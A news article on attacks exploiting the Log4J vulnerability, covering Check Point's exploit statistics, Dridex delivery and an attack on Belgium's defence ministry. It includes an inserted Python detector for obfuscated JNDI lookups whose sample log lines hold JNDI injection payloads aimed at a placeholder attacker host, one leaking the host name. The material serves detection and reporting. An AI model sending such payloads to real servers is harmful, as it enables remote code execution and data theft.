New malware strains exploiting Log4J; Belgium defence ministry latest victim


As enterprise security teams scramble to patch their systems against the Apache Log4J vulnerabilities, new malware strains exploiting the flaws and an attack on Belgium's defence ministry have come to the fore. 

Check Point yesterday reported that the share of corporate networks in which it observed attempted exploitation of the Log4J logging library has risen from 44% last Tuesday to 48% today.  

Yesterday, Google said that the full blast radius of the vulnerabilities would be difficult to identify.  

“Since Friday we witnessed what looks like an evolutionary repression, with new variations of the original exploit being introduced rapidly, over 60 in less than 24 hours,” the Check Point blog post said.  

Newer variations include delivering the exploit over HTTP or even HTTPS. Because the malicious lookup string can be placed in any request field the application happens to log, and travels encrypted when sent over HTTPS, a single network-layer control is inadequate; a multi-layered posture is an absolute necessity, according to Check Point.   
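The "new variations" Check Point counts are largely obfuscations of the same `${jndi:...}` lookup, nested inside other Log4j lookups such as `${lower:j}` or `${::-j}` so that a literal signature for `${jndi:` no longer matches. The following is an added example, not code from the article or from Check Point: it resolves a subset of Log4j 2's lookup syntax from the inside out, the way Log4j itself does, then checks the normalized string for a JNDI lookup. It runs over constructed access-log lines (the `attacker.example` host names and the `_FAKE_ENV` table are placeholders, not real data), and contrasts the result with the naive literal match. Because it works on the application's own logs rather than on the wire, it also covers the HTTPS case where a network sensor sees only ciphertext.

```python
"""Normalize obfuscated Log4j lookups and flag JNDI attempts in log lines.

Added example, not from the article or from Check Point. The sample lines,
host names and the fake environment below are constructed for illustration.
"""
import re

# Innermost ${...}: no nested "${" or "}" inside. Log4j evaluates lookups
# from the inside out, so resolving these repeatedly mirrors its behaviour.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed stand-in for the process environment used by ${env:...}.
_FAKE_ENV = {"HOSTNAME": "web01"}


def _resolve(content: str) -> str:
    """Resolve one innermost lookup body (subset of Log4j 2 semantics)."""
    # "${prefix:key:-default}": the default is used when the lookup is empty.
    if ":-" in content:
        body, default = content.split(":-", 1)
    else:
        body, default = content, None
    if ":" in body:
        prefix, key = body.split(":", 1)
    else:
        prefix, key = "", body
    prefix = prefix.lower()
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    if prefix == "env":
        if key in _FAKE_ENV:
            return _FAKE_ENV[key]
        return default if default is not None else "${" + content + "}"
    if prefix == "jndi":
        return "${" + content + "}"  # never "resolve" it; this is what we detect
    if default is not None:
        return default  # e.g. "${::-j}" -> "j" (empty prefix and key)
    return "${" + content + "}"  # unknown lookup with no default stays literal


def normalize(s: str, max_rounds: int = 20) -> str:
    """Resolve innermost lookups until the string stops changing."""
    for _ in range(max_rounds):
        new = _INNERMOST.sub(lambda m: _resolve(m.group(1)), s)
        if new == s:
            break
        s = new
    return s


def naive_match(line: str) -> bool:
    """First-generation signature: the literal '${jndi:' only."""
    return "${jndi:" in line.lower()


def is_jndi_attempt(line: str) -> bool:
    """Detect a JNDI lookup after undoing nested-lookup obfuscation."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return the indices of lines that carry a JNDI lookup."""
    return [i for i, line in enumerate(lines) if is_jndi_attempt(line)]


# Constructed access-log lines; the payload sits in the User-Agent field.
SAMPLE_LINES = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:06 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:dns://attacker.example/${hostName}}"',
    '10.0.0.7 - - [13/Dec/2021:10:01:07 +0000] "GET /?q=${lower:HELLO} HTTP/1.1" 200 512 "-" "curl/7.68"',
]

if __name__ == "__main__":
    for i, line in enumerate(SAMPLE_LINES):
        print(i, "naive" if naive_match(line) else "     ",
              "JNDI" if is_jndi_attempt(line) else "    ", normalize(line)[-60:])
```

The literal signature catches only the second line; the normalizing detector flags lines 1 through 4 and leaves the benign `${lower:HELLO}` query alone. The resolver deliberately covers only `lower`, `upper`, `env` and the `:-` default syntax; Log4j ships more lookups (`sys`, `date`, `ctx`, and others), so this is one detection layer to run on logs after TLS termination, not a substitute for upgrading Log4j or removing the JndiLookup class.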

Separately, the Cryptolaemus security research group said yesterday that it had confirmed Dridex, a banking trojan long associated with attacks on the banking, financial services and insurance (BFSI) sector, being delivered through a Log4J vulnerability.   

The group posted on Twitter that Dridex payloads have already been delivered onto multiple Windows devices.

Defence Ministry of Belgium briefly compromised  

Alarmingly, the Defence Ministry of Belgium told a local Belgian newspaper that a portion of its network was shut down owing to a cyber-attack on Thursday.  

The defence body confirmed that the attack exploited the vulnerability in Apache's widely used Log4J logging library.   

"All weekend our teams have been mobilized to control the problem, continue our activities and warn our partners," Commander Olivier Séverin told the local newspaper De Standaard.  

“It is clearly one of the most serious vulnerabilities on the internet in recent years. When we discussed the Cyber pandemic, this is exactly what we meant – quickly spreading devastating attacks,” Check Point warned.